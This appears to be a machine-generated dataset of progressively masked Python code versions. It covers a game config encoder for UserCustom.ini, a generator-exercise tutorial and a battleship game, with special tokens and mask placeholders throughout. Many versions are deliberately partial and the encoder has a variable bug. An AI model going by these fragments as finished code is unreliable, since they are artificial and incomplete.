"step-5": "decoded = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\", \"=\", \".\"]\nencoded = [\"49\", \"48\", \"4B\", \"4A\", \"4D\", \"4C\", \"4F\", \"4E\", \"41\", \"40\", \"38\", \"3B\", \"3A\", \"3D\", \"3C\", \"3F\", \"3E\", \"31\", \"30\", \"33\", \"32\", \"35\", \"34\", \"37\", \"36\", \"29\", \"28\", \"2B\", \"2A\", \"2D\", \"2C\", \"2F\", \"2E\", \"21\", \"20\", \"23\", \"18\", \"1B\", \"1A\", \"1D\", \"1C\", \"1F\", \"1E\", \"11\", \"10\", \"13\", \"12\", \"15\", \"14\", \"17\", \"16\", \"09\", \"08\", \"0B\", \"0A\", \"0D\", \"0C\", \"0F\", \"0E\", \"01\", \"00\", \"03\", \"44\", \"57\"]\n\ndef decode(value) : \n out_value = \"\"\n char = [value[i:i+2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)) :\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\ndef encode(char) : \n out_value = \"\"\n char = [value[i:i+1] for i in range(0, len(value))]\n for i in range(0, len(char)) :\n out_value += encoded[decoded.index(char[i])]\n return out_value\n\nif __name__ == \"__main__\" :\n print(\"By default the program will open UserCustom.ini which should be in the directory as the program.\")\n user_input = str(input(\"Would you like to encode or decode UserCustom.ini ? (encode/decode) \"))\n const = \"+CVars=\"\n config = open(\"UserCustom.ini\" , \"r\")\n out_file = open(\"UserCustom.ini.out\", \"w\")\n out_value = \"\"\n lines = config.readlines()\n for i in range(0, len(lines)) :\n if lines[i].startswith(const) :\n value = lines[i].split(const)[-1].split(\"\\n\")[0]\n if user_input.lower() == \"encode\" or user_input.lower() == \"e\" :\n out_value = encode(value)\n elif user_input.lower() == \"decode\" or user_input.lower() == \"d\" :\n out_value = decode(value)\n out_file.write(const + out_value + \"\\n\")\n else : \n out_file.write(lines[i]) \n out_file.close()\n config.close()\n pass",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def exercise_gen(ret_val, times):
"""Return `ret_value` `times` times.
If generator will receive some value from outside, update `ret_value`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
pass
else:
raise Exception('Generator should be invalid')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def random_numbers():
print('start generator')
while True:
val = random()
print(f'will yield {val}')
yield val
<|reserved_special_token_0|>
def inout_gen():
print('init')
ret_val = None
while True:
x = yield ret_val
if x is not None:
ret_val = x
<|reserved_special_token_0|>
def exercise_gen(ret_val, times):
"""Return `ret_value` `times` times.
If generator will receive some value from outside, update `ret_value`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
pass
else:
raise Exception('Generator should be invalid')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def random_numbers():
print('start generator')
while True:
val = random()
print(f'will yield {val}')
yield val
<|reserved_special_token_0|>
def inout_gen():
print('init')
ret_val = None
while True:
x = yield ret_val
if x is not None:
ret_val = x
def run_input_gen():
inout_g = inout_gen()
next(inout_g)
print(f'{next(inout_g)}')
print(f'{inout_g.send(22)}')
print(f'{next(inout_g)}')
def exercise_gen(ret_val, times):
"""Return `ret_value` `times` times.
If generator will receive some value from outside, update `ret_value`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
pass
else:
raise Exception('Generator should be invalid')
def exercise2():
"""Update `exercise_gen`, so it will ignore all exceptions"""
g1 = exercise_gen("I'll ignore errors", 300)
assert next(g1) == "I'll ignore errors"
assert g1.send('new val') == 'new val'
assert g1.throw(Exception) == 'new val'
assert next(g1) == 'new val'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from random import random
def random_numbers():
print('start generator')
while True:
val = random()
print(f'will yield {val}')
yield val
def run_random_numbers():
print(f'random_numbers={random_numbers!r}')
rnd_gen = random_numbers()
print(f'rnd_gen={rnd_gen!r}')
print(f'next(rnd_gen)={next(rnd_gen)!r}')
print(f'next(rnd_gen)={next(rnd_gen)!r}')
print(f'rnd_gen.send(None)={rnd_gen.send(None)!r}')
print(f'rnd_gen.send(42)={rnd_gen.send(42)!r}')
def inout_gen():
print('init')
ret_val = None
while True:
x = yield ret_val
if x is not None:
ret_val = x
def run_input_gen():
inout_g = inout_gen()
next(inout_g)
print(f'{next(inout_g)}')
print(f'{inout_g.send(22)}')
print(f'{next(inout_g)}')
def exercise_gen(ret_val, times):
"""Return `ret_value` `times` times.
If generator will receive some value from outside, update `ret_value`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
pass
else:
raise Exception('Generator should be invalid')
def exercise2():
"""Update `exercise_gen`, so it will ignore all exceptions"""
g1 = exercise_gen("I'll ignore errors", 300)
assert next(g1) == "I'll ignore errors"
assert g1.send('new val') == 'new val'
assert g1.throw(Exception) == 'new val'
assert next(g1) == 'new val'
if __name__ == '__main__':
run_random_numbers()
run_input_gen()
exercise1()
exercise2()
<|reserved_special_token_1|>
from random import random
def random_numbers():
print('start generator')
while True:
val = random()
print(f'will yield {val}')
yield val
def run_random_numbers():
print(f'{random_numbers=}')
rnd_gen = random_numbers()
print(f'{rnd_gen=}')
print(f'{next(rnd_gen)=}')
print(f'{next(rnd_gen)=}')
# but we can have two way communication
print(f'{rnd_gen.send(None)=}')
print(f'{rnd_gen.send(42)=}')
# rnd_gen.throw(Exception)
# rnd_gen.close()
# next(rnd_gen)
def inout_gen():
print('init')
ret_val = None
while True:
x = yield ret_val
if x is not None:
ret_val = x
def run_input_gen():
inout_g = inout_gen()
next(inout_g)
print(f'{next(inout_g)}')
print(f'{inout_g.send(22)}')
print(f'{next(inout_g)}')
def exercise_gen(ret_val, times):
"""Return `ret_value` `times` times.
If generator will receive some value from outside, update `ret_value`"""
def exercise1():
"""Make it pass"""
g1 = exercise_gen(42, 3)
assert next(g1) == 42
assert g1.send('new val') == 'new val'
assert next(g1) == 'new val'
try:
next(g1)
except StopIteration:
# ok
pass
else:
raise Exception('Generator should be invalid')
def exercise2():
"""Update `exercise_gen`, so it will ignore all exceptions"""
g1 = exercise_gen("I'll ignore errors", 300)
assert next(g1) == "I'll ignore errors"
assert g1.send('new val') == 'new val'
assert g1.throw(Exception) == 'new val'
assert next(g1) == 'new val'
if __name__ == '__main__':
run_random_numbers()
run_input_gen()
exercise1()
exercise2()
|
flexible
|
{
"blob_id": "e5979aeb7cff0e2a75966924382bae87aebcfcb2",
"index": 3312,
"step-1": "<mask token>\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef random_numbers():\n print('start generator')\n while True:\n val = random()\n print(f'will yield {val}')\n yield val\n\n\n<mask token>\n\n\ndef inout_gen():\n print('init')\n ret_val = None\n while True:\n x = yield ret_val\n if x is not None:\n ret_val = x\n\n\n<mask token>\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef random_numbers():\n print('start generator')\n while True:\n val = random()\n print(f'will yield {val}')\n yield val\n\n\n<mask token>\n\n\ndef inout_gen():\n print('init')\n ret_val = None\n while True:\n x = yield ret_val\n if x is not None:\n ret_val = x\n\n\ndef run_input_gen():\n inout_g = inout_gen()\n next(inout_g)\n print(f'{next(inout_g)}')\n print(f'{inout_g.send(22)}')\n print(f'{next(inout_g)}')\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\ndef exercise2():\n \"\"\"Update `exercise_gen`, so it will ignore all exceptions\"\"\"\n g1 = exercise_gen(\"I'll ignore errors\", 300)\n assert next(g1) == \"I'll ignore errors\"\n assert g1.send('new val') == 'new val'\n assert g1.throw(Exception) == 'new val'\n assert next(g1) == 'new val'\n\n\n<mask token>\n",
"step-4": "from random import random\n\n\ndef random_numbers():\n print('start generator')\n while True:\n val = random()\n print(f'will yield {val}')\n yield val\n\n\ndef run_random_numbers():\n print(f'random_numbers={random_numbers!r}')\n rnd_gen = random_numbers()\n print(f'rnd_gen={rnd_gen!r}')\n print(f'next(rnd_gen)={next(rnd_gen)!r}')\n print(f'next(rnd_gen)={next(rnd_gen)!r}')\n print(f'rnd_gen.send(None)={rnd_gen.send(None)!r}')\n print(f'rnd_gen.send(42)={rnd_gen.send(42)!r}')\n\n\ndef inout_gen():\n print('init')\n ret_val = None\n while True:\n x = yield ret_val\n if x is not None:\n ret_val = x\n\n\ndef run_input_gen():\n inout_g = inout_gen()\n next(inout_g)\n print(f'{next(inout_g)}')\n print(f'{inout_g.send(22)}')\n print(f'{next(inout_g)}')\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\ndef exercise2():\n \"\"\"Update `exercise_gen`, so it will ignore all exceptions\"\"\"\n g1 = exercise_gen(\"I'll ignore errors\", 300)\n assert next(g1) == \"I'll ignore errors\"\n assert g1.send('new val') == 'new val'\n assert g1.throw(Exception) == 'new val'\n assert next(g1) == 'new val'\n\n\nif __name__ == '__main__':\n run_random_numbers()\n run_input_gen()\n exercise1()\n exercise2()\n",
"step-5": "from random import random\n\n\ndef random_numbers():\n print('start generator')\n while True:\n val = random()\n print(f'will yield {val}')\n yield val\n\n\ndef run_random_numbers():\n print(f'{random_numbers=}')\n rnd_gen = random_numbers()\n print(f'{rnd_gen=}')\n print(f'{next(rnd_gen)=}')\n print(f'{next(rnd_gen)=}')\n\n # but we can have two way communication\n print(f'{rnd_gen.send(None)=}')\n print(f'{rnd_gen.send(42)=}')\n # rnd_gen.throw(Exception)\n # rnd_gen.close()\n # next(rnd_gen)\n\n\ndef inout_gen():\n print('init')\n ret_val = None\n while True:\n x = yield ret_val\n if x is not None:\n ret_val = x\n\n\ndef run_input_gen():\n inout_g = inout_gen()\n next(inout_g)\n\n print(f'{next(inout_g)}')\n print(f'{inout_g.send(22)}')\n print(f'{next(inout_g)}')\n\n\ndef exercise_gen(ret_val, times):\n \"\"\"Return `ret_value` `times` times.\n If generator will receive some value from outside, update `ret_value`\"\"\"\n\n\ndef exercise1():\n \"\"\"Make it pass\"\"\"\n g1 = exercise_gen(42, 3)\n assert next(g1) == 42\n assert g1.send('new val') == 'new val'\n assert next(g1) == 'new val'\n try:\n next(g1)\n except StopIteration:\n # ok\n pass\n else:\n raise Exception('Generator should be invalid')\n\n\ndef exercise2():\n \"\"\"Update `exercise_gen`, so it will ignore all exceptions\"\"\"\n g1 = exercise_gen(\"I'll ignore errors\", 300)\n assert next(g1) == \"I'll ignore errors\"\n assert g1.send('new val') == 'new val'\n assert g1.throw(Exception) == 'new val'\n assert next(g1) == 'new val'\n\n\nif __name__ == '__main__':\n run_random_numbers()\n run_input_gen()\n exercise1()\n exercise2()\n",
"step-ids": [
2,
4,
6,
9,
10
]
}
|
[
2,
4,
6,
9,
10
] |
from random import randrange
import random
"""
both user and computer funcs:
"""
def check_ok(boat, taken_positions):
# input: boat, taken_positions
# this func checks if the boat outside the playground or the position of the boat is already in taken_position
# return: boat. boat will returned as [-1] or its specific position
boat.sort()
for i in range(len(boat)):
if boat[i] in taken_positions:
#this condition checks if the block boat[i] is already in the list taken_positions
boat = [-1]
break
elif boat[i] > 99 or boat[i] < 0:
#this condition checks border 1 and 3
boat = [-1]
break
elif boat[i] % 10 == 9 and i < len(boat) - 1:
#this condition checks border 2 and 4
if boat[i + 1] % 10 == 0:
boat = [-1]
break
if i != 0:
# this condition checks if there is any hole in the boat
if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:
boat = [-1]
break
return boat
def check_shot(shot, ships, hit, miss, comp, sinked_boats):
# input: shot, all the boats (ships), hit, miss, comp, sinked_boats
# this func initially assumes that the shot is missed (cond = 0)
# given a shot, this func uses a for-loop that goes through all ships to see if the shot hits one of the ships
# if yes, remove the block of the boat that is hitted by the shot
# append the shot to hit or comp. If comp, sinked_boats += 1
# if not, append the shot to miss
# return: all the boats (ships), hit, miss, comp, cond, sinked_boats
cond = 0 # miss
for i in range(len(ships)):
if shot in ships[i]:
ships[i].remove(shot)
if len(ships[i]) > 0:
hit.append(shot)
cond = 1 # hit
else:
comp.append(shot)
cond = 2 # comp
sinked_boats += 1
if cond == 0: # miss
miss.append(shot)
return ships, hit, miss, comp, cond, sinked_boats
def create_playground(hit, miss, comp):
# input: hit, miss, comp
# this func creates the playground with the status of each block
# print the playground
print(" battleship")
print(" 0 1 2 3 4 5 6 7 8 9")
block = 0 #this variable keep track of the spot of the block
for i in range(10):
#create each row
row = ""
for j in range(10):
#create each spot on the specific row
character = "_ "
if block in miss:
character = "x "
elif block in hit:
character = "o "
elif block in comp:
character = "Q "
row += character
block += 1 #the block var increments 1 after each character is add to row
print(i, " ", row)
print("")
def check_empty(ships):
# input: ships
# [] = False, [#have element] = True
# this func checks each ship in the 2D list ships
# if ship is empty, return True, and vice versa
# if all ships are empty, return True, else return False
# return True or False
return all([not elem for elem in ships])
"""
user - 2 funcs:
"""
def create_ships_u(taken_positions, num_boats):
# input: num_boats
# this func has a loop that makes all boats,
# which calls the get_ship(len_of_boat, taken_positions) that creates a single boat
# return: ships, which are the 2D list has len(num_boats) that contains the positions of all boats
ships = [] #this is a 2D list contains the positions of all boats
for len_of_boat in num_boats:
ship, taken_positions = get_ship(len_of_boat, taken_positions)
ships.append(ship)
return ships, taken_positions
def create_playground_u(taken_positions):
print(" battleships ")
print(" 0 1 2 3 4 5 6 7 8 9")
place = 0
for x in range(10):
row = ""
for y in range(10):
ch = " _ "
if place in taken_positions:
ch = " o "
row = row + ch
place = place + 1
print(x," ",row)
def get_ship(len_of_boat, taken_positions):
# input: len_of_boat, taken_positions
# this func gets the boat's position from the user's input
# this func checks both the type of the input(is it int) and if the boat is inside playground/in taken_positions/in correct order
# return a valid ship
while True:
ship = []
print("enter your ship of length", len_of_boat)
for i in range(len_of_boat):
while True:
try:
boat_num = input("please enter a number: ")
ship.append(int(boat_num))
except ValueError: # better try again... Return to the start of the loop
print("wrong type of input")
continue
else: # is is a correct input, and we're ready to exit the loop
break
ship = check_ok(ship, taken_positions)
if -1 not in ship: # check if a ship is valid. If yes, add the ship to taken_positions and break
taken_positions += ship
break
else:
print("invalid number - please enter again")
return ship, taken_positions
def get_shot_user(guesses):
# input: guesses is the combined list of hit, miss, comp
# this funcs asks the user to enter the shot, then checks the validity of the shot
# return: the valid shot
while True:
try:
shot = int(input("Enter your shot: "))
if shot < 0 or shot > 99:
shot = int(input("Enter your shot:"))
elif shot in guesses:
print("already guessed - please enter again")
else:
return shot
except:
print("incorrect - please enter integer only")
"""
computer - 1 funcs:
"""
def create_ships_c(taken_positions, num_boats):
# input: num_boats
# this funcs has a loop that makes all boats,
# which calls the create_boat() that creates a single boat
# return: ships, which are the 2D list has len(num_boats) that contains the positions of all boats
ships = [] #this is a 2D list contains the positions of all boats
for len_of_boat in num_boats:
boat_position = [-1] #create the initial position of every boat is [-1]
while -1 in boat_position:
boat_start = randrange(99) #boat starting point
boat_direction = randrange(1, 4) #{1: "up", 2: "right", 3: "down", 4: "left"}
boat_position = create_boat(len_of_boat, boat_start, boat_direction, taken_positions) #return the position of boat
#a new boat is created after finishing the while loop
ships.append(boat_position)
taken_positions += boat_position #add all positions of the newly created boat to the list taken_positions
return ships, taken_positions
def create_boat(len_of_boat, boat_start, boat_direction, taken_positions):
# input: len_of_boat, boat_start, boat_direction, taken_positions
# this func initializes boat = []
# with len_of_boat, boat_start, boat_direction, this func create the position of the boat
# calls check_ok(boat, taken_positions) to see if the boat outside playground or the position of the boat is already in taken_position
# return: boat. boat will returned as [-1] or its specific position
boat = []
if boat_direction == 1:
for i in range(len_of_boat):
boat.append(boat_start - i * 10) # already have the position of boat after this line
boat = check_ok(boat, taken_positions)
elif boat_direction == 2:
for i in range(len_of_boat):
boat.append(boat_start + i)
boat = check_ok(boat, taken_positions)
elif boat_direction == 3:
for i in range(len_of_boat):
boat.append(boat_start + i * 10)
boat = check_ok(boat, taken_positions)
elif boat_direction == 4:
for i in range(len_of_boat):
boat.append(boat_start - i)
boat = check_ok(boat, taken_positions)
return boat
def get_shot_comp(guesses, tactics):
# input: guesses (all moves), tactics(which is the list of all valid possible moves for the shot)
# in the first mơve, tactics = []
# this func checks if len(tactics) > 0
# if yes, pick shot = tactics[0]
# if no, pick shot = randrange(99)
# this func check if shot not in guesses(which is the list of all moves)
# if yes, guess.append(shot), and break
# return: the valid shot, guesses
while True:
try:
if len(tactics) > 0:
shot = tactics[0]
else:
shot = randrange(99)
if shot not in guesses:
guesses.append(shot)
break
except:
print("incorrect - please enter integer only")
return shot, guesses
def calculate_tactics(shot, tactics, guesses, hit):
# input: shot, tactics, guesses, hit
# this function takes the newly shot, and changes the tactics list accordingly
# the list temp is the possible positions that the next shot can be
# if the shot hits the first time, len(tactics) = 0. Then, temp is the list contains 4 blocks around the shot
# else, the list temp will be created based on the last 2 shots
# candidate is the list of valid possible shots that is created from temp
# shuffle the order of elements inside candidate
# return: candidate (candidate is tactics)
temp = []
if len(tactics) < 1:
# got 1 hit the first time
temp = [shot - 1, shot + 1, shot - 10, shot + 10] # temporary places that the next shot could be
else:
# got at least 2 hits
# checks to see if the 4 spots around is in hit
if shot - 1 in hit: # east
temp = [shot + 1]
for num in [2, 3, 4, 5, 6, 7, 8]:
if shot - num not in hit:
temp.append(shot - num)
break
elif shot + 1 in hit: # west
temp = [shot - 1]
for num in [2, 3, 4, 5, 6, 7, 8]:
if shot + num not in hit:
temp.append(shot + num)
break
elif shot - 10 in hit: # south
temp = [shot + 10]
for num in [20, 30, 40, 50, 60, 70, 80]:
if shot - num not in hit:
temp.append(shot - num)
break
elif shot + 10 in hit: # north. Ex: first shot is 50, next shot is 40
temp = [shot - 10]
for num in [20, 30, 40, 50, 60, 70, 80]:
if shot + num not in hit:
temp.append(shot + num)
break
candidate = [] # list of valid places that the next shot could be
for i in range(len(temp)):
if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1: #checks the validity of places in temp
candidate.append(temp[i])
random.shuffle(candidate) # shuffle the element order of the list candidate
return candidate
"""
main program:
"""
num_boats = [5, 4, 3, 3, 2, 2] # this list contains all boats. Each boat is represented by its length
# before game
# computer - 1
hit1 = []
miss1 = []
comp1 = []
guesses1 = []
cond1 = 0
tactics1 = [] # list of possible moves after a boat is hitted. After a boat is sunked, tactics reset to []
taken_positions1 = []
sinked_boats1 = []
# user - 2
hit2 = []
miss2 = []
comp2 = []
guesses2 = []
cond2 = 0
tactics2 = []
taken_positions2 = []
sinked_boats2 = []
# computer creates ships for player 1
ships1, taken_positions1 = create_ships_c(taken_positions1, num_boats)
# user creates boat for player 2 - show board
ships2, taken_positions2 = create_ships_u(taken_positions2, num_boats)
create_playground_u(taken_positions2)
# loop for user and computer takes turn to shoot, and repeat until finding a winner:
turns = 0
while True:
turns += 1
# USER SHOOTS: using 1 because it is checking the data of computer
guesses1 = hit1 + miss1 + comp1
shot1 = get_shot_user(guesses1)
ships1, hit1, miss1, comp1, cond1, sinked_boats1 = check_shot(shot1, ships1, hit1, miss1, comp1, sinked_boats1)
create_playground(hit1, miss1, comp1)
# check if all of the computer ships are empty:
if check_empty(ships1):
print("end of game - winner in", turns)
break
# COMPUTER SHOOTS:
guesses2 = hit2 + miss2 + comp2
shot2, guesses2 = get_shot_comp(guesses2, tactics2)
ships2, hit2, miss2, comp2, cond2, sinked_boats2 = check_shot(shot2, ships2, hit2, miss2, comp2, sinked_boats2)
create_playground(hit2, miss2, comp2)
if cond2 == 1:
# got 1 hit
tactics2 = calculate_tactics(shot2, tactics2, guesses2, hit2)
elif cond2 == 2:
# comp, and sunk the boat
# reset tactics = []
tactics2 = []
elif len(tactics2) > 0: #len(tactics) > 0 means that there are still possible moves
# got 1 hit, then miss
# remove the newly shot from tactics
tactics2.pop(0)
# in case all 3 statements above are False, which means there is no hit in the first place, tactics is still []
# check if all of the computer ships are empty:
if check_empty(ships2):
print("end of game - computer wins in", turns)
break
# after both the user and computer shoot, start a new loop:
|
normal
|
{
"blob_id": "95584dfdb232be7f507dc9d29ed2f1d95fa2b653",
"index": 9642,
"step-1": "<mask token>\n\n\ndef check_ok(boat, taken_positions):\n boat.sort()\n for i in range(len(boat)):\n if boat[i] in taken_positions:\n boat = [-1]\n break\n elif boat[i] > 99 or boat[i] < 0:\n boat = [-1]\n break\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\n if boat[i + 1] % 10 == 0:\n boat = [-1]\n break\n if i != 0:\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\n boat = [-1]\n break\n return boat\n\n\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\n cond = 0\n for i in range(len(ships)):\n if shot in ships[i]:\n ships[i].remove(shot)\n if len(ships[i]) > 0:\n hit.append(shot)\n cond = 1\n else:\n comp.append(shot)\n cond = 2\n sinked_boats += 1\n if cond == 0:\n miss.append(shot)\n return ships, hit, miss, comp, cond, sinked_boats\n\n\n<mask token>\n\n\ndef check_empty(ships):\n return all([(not elem) for elem in ships])\n\n\n<mask token>\n\n\ndef create_ships_u(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\n ships.append(ship)\n return ships, taken_positions\n\n\n<mask token>\n\n\ndef create_ships_c(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n boat_position = [-1]\n while -1 in boat_position:\n boat_start = randrange(99)\n boat_direction = randrange(1, 4)\n boat_position = create_boat(len_of_boat, boat_start,\n boat_direction, taken_positions)\n ships.append(boat_position)\n taken_positions += boat_position\n return ships, taken_positions\n\n\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\n boat = []\n if boat_direction == 1:\n for i in range(len_of_boat):\n boat.append(boat_start - i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 2:\n for i in range(len_of_boat):\n boat.append(boat_start + i)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 3:\n for i in range(len_of_boat):\n boat.append(boat_start + i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 4:\n for i in range(len_of_boat):\n boat.append(boat_start - i)\n boat = check_ok(boat, taken_positions)\n return boat\n\n\ndef get_shot_comp(guesses, tactics):\n while True:\n try:\n if len(tactics) > 0:\n shot = tactics[0]\n else:\n shot = randrange(99)\n if shot not in guesses:\n guesses.append(shot)\n break\n except:\n print('incorrect - please enter integer only')\n return shot, guesses\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_ok(boat, taken_positions):\n boat.sort()\n for i in range(len(boat)):\n if boat[i] in taken_positions:\n boat = [-1]\n break\n elif boat[i] > 99 or boat[i] < 0:\n boat = [-1]\n break\n elif boat[i] % 10 == 9 and i < len(boat) - 1:\n if boat[i + 1] % 10 == 0:\n boat = [-1]\n break\n if i != 0:\n if boat[i] != boat[i - 1] + 1 and boat[i] != boat[i - 1] + 10:\n boat = [-1]\n break\n return boat\n\n\ndef check_shot(shot, ships, hit, miss, comp, sinked_boats):\n cond = 0\n for i in range(len(ships)):\n if shot in ships[i]:\n ships[i].remove(shot)\n if len(ships[i]) > 0:\n hit.append(shot)\n cond = 1\n else:\n comp.append(shot)\n cond = 2\n sinked_boats += 1\n if cond == 0:\n miss.append(shot)\n return ships, hit, miss, comp, cond, sinked_boats\n\n\ndef create_playground(hit, miss, comp):\n print(' battleship')\n print(' 0 1 2 3 4 5 6 7 8 9')\n block = 0\n for i in range(10):\n row = ''\n for j in range(10):\n character = '_ '\n if block in miss:\n character = 'x '\n elif block in hit:\n character = 'o '\n elif block in comp:\n character = 'Q '\n row += character\n block += 1\n print(i, ' ', row)\n print('')\n\n\ndef check_empty(ships):\n return all([(not elem) for elem in ships])\n\n\n<mask token>\n\n\ndef create_ships_u(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n ship, taken_positions = get_ship(len_of_boat, taken_positions)\n ships.append(ship)\n return ships, taken_positions\n\n\n<mask token>\n\n\ndef get_shot_user(guesses):\n while True:\n try:\n shot = int(input('Enter your shot: '))\n if shot < 0 or shot > 99:\n shot = int(input('Enter your shot:'))\n elif shot in guesses:\n print('already guessed - please enter again')\n else:\n return shot\n except:\n print('incorrect - please enter integer only')\n\n\n<mask token>\n\n\ndef create_ships_c(taken_positions, num_boats):\n ships = []\n for len_of_boat in num_boats:\n boat_position = [-1]\n while -1 in boat_position:\n boat_start = randrange(99)\n boat_direction = randrange(1, 4)\n boat_position = create_boat(len_of_boat, boat_start,\n boat_direction, taken_positions)\n ships.append(boat_position)\n taken_positions += boat_position\n return ships, taken_positions\n\n\ndef create_boat(len_of_boat, boat_start, boat_direction, taken_positions):\n boat = []\n if boat_direction == 1:\n for i in range(len_of_boat):\n boat.append(boat_start - i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 2:\n for i in range(len_of_boat):\n boat.append(boat_start + i)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 3:\n for i in range(len_of_boat):\n boat.append(boat_start + i * 10)\n boat = check_ok(boat, taken_positions)\n elif boat_direction == 4:\n for i in range(len_of_boat):\n boat.append(boat_start - i)\n boat = check_ok(boat, taken_positions)\n return boat\n\n\ndef get_shot_comp(guesses, tactics):\n while True:\n try:\n if len(tactics) > 0:\n shot = tactics[0]\n else:\n shot = randrange(99)\n if shot not in guesses:\n guesses.append(shot)\n break\n except:\n print('incorrect - please enter integer only')\n return shot, guesses\n\n\ndef calculate_tactics(shot, tactics, guesses, hit):\n temp = []\n if len(tactics) < 1:\n temp = [shot - 1, shot + 1, shot - 10, shot + 10]\n elif shot - 1 in hit:\n temp = [shot + 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 1 in hit:\n temp = [shot - 1]\n for num in [2, 3, 4, 5, 6, 7, 8]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n elif shot - 10 in hit:\n temp = [shot + 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot - num not in hit:\n temp.append(shot - num)\n break\n elif shot + 10 in hit:\n temp = [shot - 10]\n for num in [20, 30, 40, 50, 60, 70, 80]:\n if shot + num not in hit:\n temp.append(shot + num)\n break\n candidate = []\n for i in range(len(temp)):\n if temp[i] not in guesses and temp[i] < 100 and temp[i] > -1:\n candidate.append(temp[i])\n random.shuffle(candidate)\n return candidate\n\n\n<mask token>\n",
